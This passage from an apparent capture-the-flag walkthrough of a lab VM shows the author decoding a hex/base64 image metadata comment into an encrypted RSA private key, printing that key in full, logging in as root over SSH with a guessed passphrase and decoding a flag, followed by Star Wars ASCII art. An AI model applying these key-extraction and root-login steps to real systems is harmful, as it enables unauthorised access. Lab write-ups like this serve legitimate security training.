Comment                         : 4c5330744c5331435255644a546942535530456755464a4a566b46555253424c52566b744c5330744c517051636d396a4c565235634755364944517352553544556c6c5156455645436b52460a5379314a626d5a764f69424252564d744d5449344c554e43517977324d6a46424d7a68425155513052546c475155457a4e6a55335130457a4f44673452446c434d7a553251776f4b625552300a556e684a643267304d464a54546b467a4d697473546c4a49646c4d356557684e4b325668654868564e586c795231424461334a6955566376556d64515543745352307043656a6c57636c52720a646c6c334e67705a59303931575756615457707a4e475a4a55473433526c7035536d64345230686f5533685262336857626a6c7252477433626e4e4e546b5270636e526a62304e50617a6c530a524546484e5756344f58673056453136436a684a624552435558453161546c5a656d6f35646c426d656d56435246706b53586f35524863795a323479553246465a335531656d56734b7a5a490a52303969526a686161444e4e53574e6f6554687a4d5668795254414b61335a4d53306b794e544a74656c64334e47746955334d354b31466856336c6f4d7a52724f45704a566e7031597a46520a51336c69656a56586231553157545532527a5a784d564a6b637a426959315a785446567a5a51704e5533704c617a4e745332465851586c4d574778764e3078756258467856555a4c5347356b0a516b557855326851566c5a704e47497752336c475355785054335a3062585a47596a5172656d68314e6d705056316c49436d73796147524453453554644374705a3264354f57686f4d3270680a52576456626c4e51576e56464e30354b6430525a5954646c553052685a3077784e31684c634774744d6c6c70516c5a7956566834566b31756232494b643168535a6a56435930644c56546b330a65475276636c59795648457261446c4c553278615a5463354f58527956484a475230356c4d4456326545527961576f315658517953324e52654373354f457334533342585441706e645570510a556c424c52326c71627a6b3253455248597a4e4d4e566c7a65453969566d63724c325a714d4546326330746d636d4e574c327834595663725357313562574d7854566870536b316962554e360a62455233436c52425632316863577453526b52355154464956585a30646c4e6c566e46544d533949616d6845647a6c6b4e45747a646e4e71613270326557565256484e7a5a6e4e6b52324e560a4d47684561316833556c647a6332514b4d6d517a5279744f616d3078556a56615445356e556d784f63465a48616d684c517a524263325a59557a4e4b4d486f7964444e4355453035576b39430a54554a6c4f5552344f4870744e58684757546c365633527964677042523342794d454a6f4f45745264323177616c4656597a46685a6e4e78595646594d465649546b7859564446615431644c0a616d63305530457a57454d355a454e4665555a784d464e4a65464671547a6c4d52304e48436a52524e57356a5a6c566f62585a3063586c3164454e7362444a6b5746427a57465a455a54526c0a6230517851327432536b354557544e4c554663725232744f4f5577724f554e516554677252453531626b5a4a6433674b4b3151724b7a64525a7939315546684c6354524e4e6a464a555467770a4d7a52566148565356314d30564846514f57463657444e44527a6c4d65573970516a5a57596b74505a555233546a68686157784d533170436377706d57546c524e6b464e4d584e3562476c360a53444675626e684c5433526155566431636e68715230704353584d324d6e526c6245317259584d356555354e617a4e4d64546478556b6732633364504f584e6b56454a70436974714d4867300a64555261616b706a5a30315965475a694d4863315154593062466c4763303153656b5a714e31686b5a6e6b784f53744e5a54684b525768524f45744f57455233555574456556564d526b39550a63336f4b4d544e575a6b4a4f65466c7a65557731656b6459546e703563566f3053533950547a644e5a575179616a4248656a426e4d6a4670534545764d445a74636e4d795932786b637a5a540a56554a4852585a754f4535705667707955334a494e6e5a46637a5254656d63776544686b5a45643255544278567a463254577455556e557a54336b765a544577526a63304e586845545546550a53314a7353316f32636c6c4954554e34536a4e4a59323530436b56364d45394e57466c6b517a5a4461555976535664305a3252564b32684c65585a7a4e484e4764454e4359327854595764740a5246524b4d6d74615a485530556c4a3357565a574e6d394a546e6f35596e4250646b554b556e677a534656785a6d354c553268796458704e4f56707261556c7264564e6d556e526d615531320a596c52365a6d5a4b56464d30597a513451303831574339535a5559765157464e654774695532524654305a7a53517047646a6c595a476b355532524f6458684853455579527a5249646b706b0a53584279526c5679566c4e7755306b344d48646e636d49794e44567a647a5a6e5647397064466f354d47684b4e47354b4e5746354e304648436c6c7059574531627a63344e7a63765a6e63320a57566f764d6c557a5155526b61564e50516d3072614770574d6b705765484a7665565659596b63315a475a734d32303452335a6d4e7a464b4e6a4a4753484534646d6f4b63557068626c4e720a4f4445334e586f77596d70795746646b5445637a52464e735355707063327851567974355247466d4e316c43566c6c33563149725645457861304d326157564a5154563056544e776269394a0a4d776f324e466f31625842444b3364785a6c52345232646c51334e6e53577335646c4e754d6e41765a5756305a456b7a5a6c46584f46645952564a69524756304d56564d5346427864456c700a4e314e61596d6f3464697451436d5a7553457852646b563353584d72516d59785133424c4d554672576d565654564a4655577443614552704e7a4a49526d4a334d6b6376656e46306153395a0a5a4735786545463562445a4d576e704a5a5646754f48514b4c3064714e477468636b6f78615530355357597a4f57524e4e55396851315a615569395554304a575956493462584a514e315a300a536d39794f57706c53444a305255777764473946635664434d56424c4d48565955416f744c5330744c55564f524342535530456755464a4a566b46555253424c52566b744c5330744c516f3d0a
Image Width                     : 960
Image Height                    : 720
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)
Image Size                      : 960x720
Megapixels                      : 0.691
eric@geoda:/tmp$ 

I then take the contents of the Comment field and run xxd and decode in base64 again:


eric@geoda:/tmp$ echo "4c5330744c5331435255644a546942535530456755464a4a566b46555253424c52566b744c5330744c517051636d396a4c565235634755364944517352553544556c6c5156455645436b52460a5379314a626d5a764f69424252564d744d5449344c554e43517977324d6a46424d7a68425155513052546c475155457a4e6a55335130457a4f44673452446c434d7a553251776f4b625552300a556e684a643267304d464a54546b467a4d697473546c4a49646c4d356557684e4b325668654868564e586c795231424461334a6955566376556d64515543745352307043656a6c57636c52720a646c6c334e67705a59303931575756615457707a4e475a4a55473433526c7035536d64345230686f5533685262336857626a6c7252477433626e4e4e546b5270636e526a62304e50617a6c530a524546484e5756344f58673056453136436a684a624552435558453161546c5a656d6f35646c426d656d56435246706b53586f35524863795a323479553246465a335531656d56734b7a5a490a52303969526a686161444e4e53574e6f6554687a4d5668795254414b61335a4d53306b794e544a74656c64334e47746955334d354b31466856336c6f4d7a52724f45704a566e7031597a46520a51336c69656a56586231553157545532527a5a784d564a6b637a426959315a785446567a5a51704e5533704c617a4e745332465851586c4d574778764e3078756258467856555a4c5347356b0a516b557855326851566c5a704e47497752336c475355785054335a3062585a47596a5172656d68314e6d705056316c49436d73796147524453453554644374705a3264354f57686f4d3270680a52576456626c4e51576e56464e30354b6430525a5954646c553052685a3077784e31684c634774744d6c6c70516c5a7956566834566b31756232494b643168535a6a56435930644c56546b330a65475276636c59795648457261446c4c553278615a5463354f58527956484a475230356c4d4456326545527961576f315658517953324e52654373354f457334533342585441706e645570510a556c424c52326c71627a6b3253455248597a4e4d4e566c7a65453969566d63724c325a714d4546326330746d636d4e574c327834595663725357313562574d7854566870536b316962554e360a62455233436c52425632316863577453526b52355154464956585a30646c4e6c566e46544d533949616d6845647a6c6b4e45747a646e4e71613270326557565256484e7a5a6e4e6b52324e560a4d47684561316833556c647a6332514b4d6d517a5279744f616d3078556a56615445356e556d784f63465a48616d684c517a524263325a59557a4e4b4d486f7964444e4355453035576b39430a54554a6c4f5552344f4870744e58684757546c365633527964677042523342794d454a6f4f45745264323177616c4656597a46685a6e4e78595646594d465649546b7859564446615431644c0a616d63305530457a57454d355a454e4665555a784d464e4a65464671547a6c4d52304e48436a52524e57356a5a6c566f62585a3063586c3164454e7362444a6b5746427a57465a455a54526c0a6230517851327432536b354557544e4c554663725232744f4f5577724f554e516554677252453531626b5a4a6433674b4b3151724b7a64525a7939315546684c6354524e4e6a464a555467770a4d7a52566148565356314d30564846514f57463657444e44527a6c4d65573970516a5a57596b74505a555233546a68686157784d533170436377706d57546c524e6b464e4d584e3562476c360a53444675626e684c5433526155566431636e68715230704353584d324d6e526c6245317259584d356555354e617a4e4d64546478556b6732633364504f584e6b56454a70436974714d4867300a64555261616b706a5a30315965475a694d4863315154593062466c4763303153656b5a714e31686b5a6e6b784f53744e5a54684b525768524f45744f57455233555574456556564d526b39550a63336f4b4d544e575a6b4a4f65466c7a65557731656b6459546e703563566f3053533950547a644e5a575179616a4248656a426e4d6a4670534545764d445a74636e4d795932786b637a5a540a56554a4852585a754f4535705667707955334a494e6e5a46637a5254656d63776544686b5a45643255544278567a463254577455556e557a54336b765a544577526a63304e586845545546550a53314a7353316f32636c6c4954554e34536a4e4a59323530436b56364d45394e57466c6b517a5a4461555976535664305a3252564b32684c65585a7a4e484e4764454e4359327854595764740a5246524b4d6d74615a485530556c4a3357565a574e6d394a546e6f35596e4250646b554b556e677a534656785a6d354c553268796458704e4f56707261556c7264564e6d556e526d615531320a596c52365a6d5a4b56464d30597a513451303831574339535a5559765157464e654774695532524654305a7a53517047646a6c595a476b355532524f6458684853455579527a5249646b706b0a53584279526c5679566c4e7755306b344d48646e636d49794e44567a647a5a6e5647397064466f354d47684b4e47354b4e5746354e304648436c6c7059574531627a63344e7a63765a6e63320a57566f764d6c557a5155526b61564e50516d3072614770574d6b705765484a7665565659596b63315a475a734d32303452335a6d4e7a464b4e6a4a4753484534646d6f4b63557068626c4e720a4f4445334e586f77596d70795746646b5445637a52464e735355707063327851567974355247466d4e316c43566c6c33563149725645457861304d326157564a5154563056544e776269394a0a4d776f324e466f31625842444b3364785a6c52345232646c51334e6e53577335646c4e754d6e41765a5756305a456b7a5a6c46584f46645952564a69524756304d56564d5346427864456c700a4e314e61596d6f3464697451436d5a7553457852646b563353584d72516d59785133424c4d554672576d565654564a4655577443614552704e7a4a49526d4a334d6b6376656e46306153395a0a5a4735786545463562445a4d576e704a5a5646754f48514b4c3064714e477468636b6f78615530355357597a4f57524e4e55396851315a615569395554304a575956493462584a514e315a300a536d39794f57706c53444a305255777764473946635664434d56424c4d48565955416f744c5330744c55564f524342535530456755464a4a566b46555253424c52566b744c5330744c516f3d0a" | xxd -p -r | base64 -d
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,621A38AAD4E9FAA3657CA3888D9B356C

mDtRxIwh40RSNAs2+lNRHvS9yhM+eaxxU5yrGPCkrbQW/RgPP+RGJBz9VrTkvYw6
YcOuYeZMjs4fIPn7FZyJgxGHhSxQoxVn9kDkwnsMNDirtcoCOk9RDAG5ex9x4TMz
8IlDBQq5i9Yzj9vPfzeBDZdIz9Dw2gn2SaEgu5zel+6HGObF8Zh3MIchy8s1XrE0
kvLKI252mzWw4kbSs9+QaWyh34k8JIVzuc1QCybz5WoU5Y56G6q1Rds0bcVqLUse
MSzKk3mKaWAyLXlo7LnmqqUFKHndBE1ShPVVi4b0GyFILOOvtmvFb4+zhu6jOWYH
k2hdCHNSt+iggy9hh3jaEgUnSPZuE7NJwDYa7eSDagL17XKpkm2YiBVrUXxVMnob
wXRf5BcGKU97xdorV2Tq+h9KSlZe799trTrFGNe05vxDrij5Ut2KcQx+98K8KpWL
guJPRPKGijo96HDGc3L5YsxObVg+/fj0AvsKfrcV/lxaW+Imymc1MXiJMbmCzlDw
TAWmaqkRFDyA1HUvtvSeVqS1/HjhDw9d4KsvsjkjvyeQTssfsdGcU0hDkXwRWssd
2d3G+Njm1R5ZLNgRlNpVGjhKC4AsfXS3J0z2t3BPM9ZOBMBe9Dx8zm5xFY9zWtrv
AGpr0Bh8KQwmpjQUc1afsqaQX0UHNLXT1ZOWKjg4SA3XC9dCEyFq0SIxQjO9LGCG
4Q5ncfUhmvtqyutCll2dXPsXVDe4eoD1CkvJNDY3KPW+GkN9L+9CPy8+DNunFIwx
+T++7Qg/uPXKq4M61IQ8034UhuRWS4TqP9azX3CG9LyoiB6VbKOeDwN8ailLKZBs
fY9Q6AM1sylizH1nnxKOtZQWurxjGJBIs62telMkas9yNMk3Lu7qRH6swO9sdTBi
+j0x4uDZjJcgMXxfb0w5A64lYFsMRzFj7Xdfy19+Me8JEhQ8KNXDwQKDyULFOTsz
13VfBNxYsyL5zGXNzyqZ4I/OO7Med2j0Gz0g21iHA/06mrs2clds6SUBGEvn8NiV
rSrH6vEs4Szg0x8ddGvQ0qW1vMkTRu3Oy/e10F745xDMATKRlKZ6rYHMCxJ3Icnt
Ez0OMXYdC6CiF/IWtgdU+hKyvs4sFtCBclSagmDTJ2kZdu4RRwYVV6oINz9bpOvE
Rx3HUqfnKShruzM9ZkiIkuSfRtfiMvbTzffJTS4c48CO5X/ReF/AaMxkbSdEOFsI
Fv9Xdi9SdNuxGHE2G4HvJdIprFUrVSpSI80wgrb245sw6gToitZ90hJ4nJ5ay7AG
Yiaa5o7877/fw6YZ/2U3ADdiSOBm+hjV2JVxroyUXbG5dfl3m8Gvf71J62FHq8vj
qJanSk8175z0bjrXWdLG3DSlIJislPW+yDaf7YBVYwWR+TA1kC6ieIA5tU3pn/I3
64Z5mpC+wqfTxGgeCsgIk9vSn2p/eetdI3fQW8WXERbDet1ULHPqtIi7SZbj8v+P
fnHLQvEwIs+Bf1CpK1AkZeUMREQkBhDi72HFbw2G/zqti/YdnqxAyl6LZzIeQn8t
/Gj4karJ1iM9If39dM5OaCVZR/TOBVaR8mrP7VtJor9jeH2tEL0toEqWB1PK0uXP
-----END RSA PRIVATE KEY-----
eric@geoda:/tmp$ 

Nice! As expected, this was in fact an RSA Private Key!!

I echo this into my authorized_keys file and take away all permissions besides my current user:


eric@geoda:/tmp$ echo "-----BEGIN RSA PRIVATE KEY-----
> Proc-Type: 4,ENCRYPTED
> DEK-Info: AES-128-CBC,621A38AAD4E9FAA3657CA3888D9B356C
> 
> mDtRxIwh40RSNAs2+lNRHvS9yhM+eaxxU5yrGPCkrbQW/RgPP+RGJBz9VrTkvYw6
> YcOuYeZMjs4fIPn7FZyJgxGHhSxQoxVn9kDkwnsMNDirtcoCOk9RDAG5ex9x4TMz
> 8IlDBQq5i9Yzj9vPfzeBDZdIz9Dw2gn2SaEgu5zel+6HGObF8Zh3MIchy8s1XrE0
> kvLKI252mzWw4kbSs9+QaWyh34k8JIVzuc1QCybz5WoU5Y56G6q1Rds0bcVqLUse
> MSzKk3mKaWAyLXlo7LnmqqUFKHndBE1ShPVVi4b0GyFILOOvtmvFb4+zhu6jOWYH
> k2hdCHNSt+iggy9hh3jaEgUnSPZuE7NJwDYa7eSDagL17XKpkm2YiBVrUXxVMnob
> wXRf5BcGKU97xdorV2Tq+h9KSlZe799trTrFGNe05vxDrij5Ut2KcQx+98K8KpWL
> guJPRPKGijo96HDGc3L5YsxObVg+/fj0AvsKfrcV/lxaW+Imymc1MXiJMbmCzlDw
> TAWmaqkRFDyA1HUvtvSeVqS1/HjhDw9d4KsvsjkjvyeQTssfsdGcU0hDkXwRWssd
> 2d3G+Njm1R5ZLNgRlNpVGjhKC4AsfXS3J0z2t3BPM9ZOBMBe9Dx8zm5xFY9zWtrv
> AGpr0Bh8KQwmpjQUc1afsqaQX0UHNLXT1ZOWKjg4SA3XC9dCEyFq0SIxQjO9LGCG
> 4Q5ncfUhmvtqyutCll2dXPsXVDe4eoD1CkvJNDY3KPW+GkN9L+9CPy8+DNunFIwx
> +T++7Qg/uPXKq4M61IQ8034UhuRWS4TqP9azX3CG9LyoiB6VbKOeDwN8ailLKZBs
> fY9Q6AM1sylizH1nnxKOtZQWurxjGJBIs62telMkas9yNMk3Lu7qRH6swO9sdTBi
> +j0x4uDZjJcgMXxfb0w5A64lYFsMRzFj7Xdfy19+Me8JEhQ8KNXDwQKDyULFOTsz
> 13VfBNxYsyL5zGXNzyqZ4I/OO7Med2j0Gz0g21iHA/06mrs2clds6SUBGEvn8NiV
> rSrH6vEs4Szg0x8ddGvQ0qW1vMkTRu3Oy/e10F745xDMATKRlKZ6rYHMCxJ3Icnt
> Ez0OMXYdC6CiF/IWtgdU+hKyvs4sFtCBclSagmDTJ2kZdu4RRwYVV6oINz9bpOvE
> Rx3HUqfnKShruzM9ZkiIkuSfRtfiMvbTzffJTS4c48CO5X/ReF/AaMxkbSdEOFsI
> Fv9Xdi9SdNuxGHE2G4HvJdIprFUrVSpSI80wgrb245sw6gToitZ90hJ4nJ5ay7AG
> Yiaa5o7877/fw6YZ/2U3ADdiSOBm+hjV2JVxroyUXbG5dfl3m8Gvf71J62FHq8vj
> qJanSk8175z0bjrXWdLG3DSlIJislPW+yDaf7YBVYwWR+TA1kC6ieIA5tU3pn/I3
> 64Z5mpC+wqfTxGgeCsgIk9vSn2p/eetdI3fQW8WXERbDet1ULHPqtIi7SZbj8v+P
> fnHLQvEwIs+Bf1CpK1AkZeUMREQkBhDi72HFbw2G/zqti/YdnqxAyl6LZzIeQn8t
> /Gj4karJ1iM9If39dM5OaCVZR/TOBVaR8mrP7VtJor9jeH2tEL0toEqWB1PK0uXP
> -----END RSA PRIVATE KEY-----
> " > ~/.ssh/authorized_keys
eric@geoda:/tmp$ chmod 0400 ~/.ssh/authorized_keys

With my file setup, I try to login with root:


eric@geoda:/tmp$ ssh root@192.168.56.103 -p 62964 -i ~/.ssh/authorized_keys 
Enter passphrase for key '/home/eric/.ssh/authorized_keys': 
root@192.168.56.103's password: 
Permission denied, please try again.
root@192.168.56.103's password: 
Permission denied, please try again.
root@192.168.56.103's password: 
Permission denied (publickey,password).
eric@geoda:/tmp$

So close! Looks like it still requires a password. But what's my password? I realized that the file that I copied down was a JPEG and I never actually viewed it.


It's a picture with the words "Use the Force". I bet this is the password! I tried many variations and "usetheforce" was the correct one!


eric@geoda:/tmp$ ssh root@192.168.56.103 -p 62964 -i ~/.ssh/authorized_keys 
Enter passphrase for key '/home/eric/.ssh/authorized_keys': 

Last login: Tue Apr 25 18:38:02 2017 from 192.168.56.1

flag6{NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK}
root@64base:~# 

Success! And there's flag6!


flag6{NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK}


The Finale


I try to decode the flag but realize there were many iterations between HEX and base64. I run xxd and base64 -d multiple times until I get the original message:



root@64base:~# echo "NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK" | base64 -d | xxd -r -p | base64 -d | xxd -r -p | base64 -d
base64 -d /var/local/.luke|less.real
root@64base:~# 


It says "base64 -d /var/local/.luke|less.real". I of course do as it says and I'm presented with the finale!



        \ \        / / | | | |  __ \                     
          \ \  /\  / /__| | | | |  | | ___  _ __   ___    
           \ \/  \/ / _ \ | | | |  | |/ _ \| '_ \ / _ \   
            \  /\  /  __/ | | | |__| | (_) | | | |  __/   
         __  \/ _\/ \___|_|_|_|_____/ \___/|_|_|_|\___| _ 
         \ \   / /          |  __ \(_)   | | |_   _| | | |
          \ \_/ /__  _   _  | |  | |_  __| |   | | | |_| |
           \   / _ \| | | | | |  | | |/ _` |   | | | __| |
            | | (_) | |_| | | |__| | | (_| |  _| |_| |_|_|
            |_|\___/ \__,_| |_____/|_|\__,_| |_____|\__(_)
    
_____ _ _ _ __ __ __  _ ___ _   __  ___  __ __  __  _  ___ _ _  __ _________
%=x%= | |V| |_)|_ |_) | |_| |   |_) |_| (_  |_  |_) |  |_| |\| (_  %=x%=x%=x
~~~~~ | | | |  |_ | \ | | | |_  |_) | | __) |_  |   |_ | | | | __) ~~~~~~~~~
LS
                 .-. .-.
               .=========.         E x t e r i o r ,   A e r i a l   V i e w
               ||.-.7.-.||         -----------------------------------------
               ||`-' `-'||
               `========='
                `-'| |`-'8               1 .............. Sensor Suite Tower
          ______   |9|   ______          2 ... Heavy Twin Turbolaser Turrets
         /     /\__| |__/\     \         3 ............. Heavy Laser Turrets
        /  \_ / /  |_|  \ \ _/  \        4 ....... TIE Fighter Launch Chutes
       /___(\\\/         \///)___\       5 ............... Heavy Blast Doors
       \____\\`==========='//____/       6 .................... Guard towers
       /     '/ .-------. \\     \       7 ........ Shuttle Landing Platform
    __/     //. \`+---+'/ .\\     \__    8 ........... AT-AT Docking Station
   /\ \    ///x`.\|___|/.'x\\\    / /\   9 ................. Connecting Ramp
  /  \ \  //`-._//|   |\\_.2'\\  / /  \
 /  _.-==='_____//.-=-.\\_____`===-._  \
 \   `-===.\-.  \ `-=1' /  .-/.===-' 3 / The pre-fabricated,  multi-function
  \  / /  \\\ \  \.===./  /4///  \ \  /  Imperial garrison base is the back-
   \/_/    \\\ | /.---.\ | ///    \_\/   bone of the  Empire's  occupational
      \     \\\|/ |_m_| \|///     /      forces. These heavily-armoured for-
       \_____\=============/_____/       tresses have  walls up to 10 meters
       /____///    ___    \\\____\       thick  to  guard   against   ground
       \   (_//\__|||||__/\\_)   /       assaults,  and  powerful  deflector
        \  /  \|,,|||||,,|/  \  /        shields  protect  them  for  air or
         \_____|  | 5 | 6|_____/         space attacks.
               `--'   `--'
____________________________________________________________________________
%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

                           U           E x t e r i o r ,   S i d e   V i e w
                          /_\          -------------------------------------
                       1 [___]
                         :`:':           1 .............. Sensor Suite Tower
                         `:::'           2 ... Heavy Twin Turbolaser Turrets
                  _       :_:       _    3 ............. Heavy Laser Turrets
                =[ ]2     [%]      [ ]=  4 ....... Tie Fighter Launch Chutes
                 :=:      :=:      :=:   5 ............... Heavy Blast Doors
                _|_|_   __| |__   _|_|_  6 .................... Guard Towers
               / /XX|\ /__|_|__\ /|XX\ \
         3    /4/XXX| | _/___\_ | |XXX\ \             7 ....... AT-AT Walker
    --===____/--===X|_|/_______\|_|X===--\____===--   8 ........ AT-ST Scout
     /__| |     /l_\\             //_|\     |_|__\
    /~~.' |    /:'  \\   _____   //  `:\    | `.  \
   /   | .'   / |    \\==|||||==//    | \   `. |   \   7    8
  /   .' |   / .'     |  ||5|| 6|     `. \   | `.   \  xx=   _
 /____|__|__/__|______l__|||||__l______|__\__|__|____\ ll   <~

____________________________________________________________________________
%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

                                                 O u t e r   D e f e n s e s
            |                      |             ---------------------------
         ^_[]_^                 ^_[]_^
         |----|               5 |----|        1 ... High Voltage Death Fence
 ________`-..-'________4________`-..-'______  2 ....... Perimeter Gate House
 ===========================================  3 ........ Powered Force Field
          `||'                   `||'         4 .......... Fortified Catwalk
           ||     ^==^   ^==^     ||          5 ......... Observattion tower
 ___.____._ll_._1_|--|   |--|___._ll_.____.____
 XXX|XXXX|XIIX|XXX|--| 3 |--|XXX|XIIX|XXXX|XXXX
 XXX|XXXX|XIIX|XXX| 2|   |  |XXX|XIIX|XXXX|XXXX

 The outer perimeter is  marked  by a  high-voltage  "death fence."  Powered
 Force fields  placed at regular intervals along the fence may be turned off
 to permit entry and exit.  Observation towers,  connected by fortified cat-
 walks,  are set back from the fence and constantly manned by stormtroopers.
 Other outer  defenses  include energy mine fields,  modified patrol Droids,
 and AT-ST Scout Walkers.

____________________________________________________________________________
%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
             _
            /|                               L a n d i n g   P l a t f o r m
          -==+                               -------------------------------
            :
         [__________]               Up to two Lambda-class shuttles and four
         `' ||  ||`-'               AT-AT  Walkers can dock at the platform.
           ========  =xx            A loading  ramp  leads directly from the
            ||  ||    ll            platform into the garrison complex.
     ~~~~~~~~~~~~~~~~~~~~~~
____________________________________________________________________________
%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

                                     I n t e r i o r ,   L e v e l s   1 - 5
                                     ---------------------------------------

          ______         ______      The first 5 levels of the garrison com-
         / ____ \_______/ ____ \     plex are of identical layout, construc-
        / /    \_________/    \ \    ted  around  a  level-spanning  surface
       / /      |   3   |  5   \ \   vehicle bay.  Refer to the key below to
       \ \       \_____/_______/ /   determine what each level contains.
       / /    o   |o o|   o    \ \
    __/ /  2    .' o4o `.    6  \ \__    1 ... Storage Gallery (levels 1-2),
   / __/      .' ._o_o_. `.      \__ \         Armory (levels 3-4), Training
  / /  `-.  .' .'  10   `. `.  .-'  \ \        Facilities   and   Recreation
 / /      ~' .'`-._____.-'`. `~      \ \       Rooms (level 5)
 \ \     o  <  C  | | |  D  >  o  7  / / 2 ... Stormtrooper Barracks (levels
  \ \__      \    ' ' '    /      __/ /        1-3),    Security    Barracks
   \__ \  1  |----  9  ----|~-._ / __/         (levels 4-5)
      \ \    |====    B====|    Y /      3 ...... Base Security (levels 1-5)
       \ \   |----     ----|   / /       4 ......... Turbolifts (levels 1-6)
       / /   |__A_     _ __| 8 \ \       5 .... Detention Block (levels 1-5)
       \ \      | |   | |      / /       6 ... Technical and Service Person-
        \ \_____| |   | |_____/ /              nel Barracks (levels 1-5)
         \_____ `o|   |o' _____/         7 ... Technical Shops (levels 1-2),
               `--'   `--'                     Medical   Bay    (level   3),
                                               Science Labs (levels 4-5)
                8 ... Storage Gallery (levels 1-2), Droid Shops (levels 3-5)
                9 ...................... Surface Vehicle  Bay  (levels 1-5):
                A .................................. AT-ST Scout Walker Bays
                B ........................................ AT-AT Walker Bays
                C ...................... Vehicle Maintenance and Repair Deck
                D ........................................ Speeder Bike Deck
                10 ........................... Miscellaneous Vehicle Parking

____________________________________________________________________________
%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

                                           I n t e r i o r ,   L e v e l   6
                                           ---------------------------------
         ____           ____
        / __ \_________/ __ \        Base command personnel,  control rooms,
       / /  \___________/  \ \       rooms,  trade  mission,  and diplomatic
       \ \ o     oo      o / /       offices are located on this level.
       / /       oo----.   \ \
      / /   8  __oo     `.1 \ \      1 ....... Sensor Monitors, Tractor Beam
   __/ /\    .~  ||   2   \  \ \__                       and Shield Controls
  / __/  \ .' 9.-'`-.      | /\__ \  2 ....................... Computer Room
 / /   o  \|__:   o  :_____|/ o  \ \ 3 ....................... Meeting Rooms
 \ \__  7 .---: 10   :------.3 __/ / 4 ...... Officers' and Pilots' Quarters
  \__ \  /     `-..-'        \/ __/  5 ... Trade Mission, Diplomatic Offices
     \ \/\   5   ||          / /     6 ........... Base Commander's Quarters
      \ \ `.     ||    4    / /                                  and offices
       \ \ o~`---||      o / /       7 ............ Officer Recreation Rooms
       / /6  ____||_____   \ \       8 ............................. Offices
       \ \__/ _________ \__/ /       9 ................... Base Control Room
        \____/         \____/        10 ..................... Reception Area


____________________________________________________________________________
%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

                                           I n t e r i o r ,   L e v e l   7
                                           ---------------------------------
        __             __
       /_]\           /[_\        The TIE Fighter  Hanger  Deck  houses  the
       \ \,===========./ /        garrison's TIE fighters in standard-design
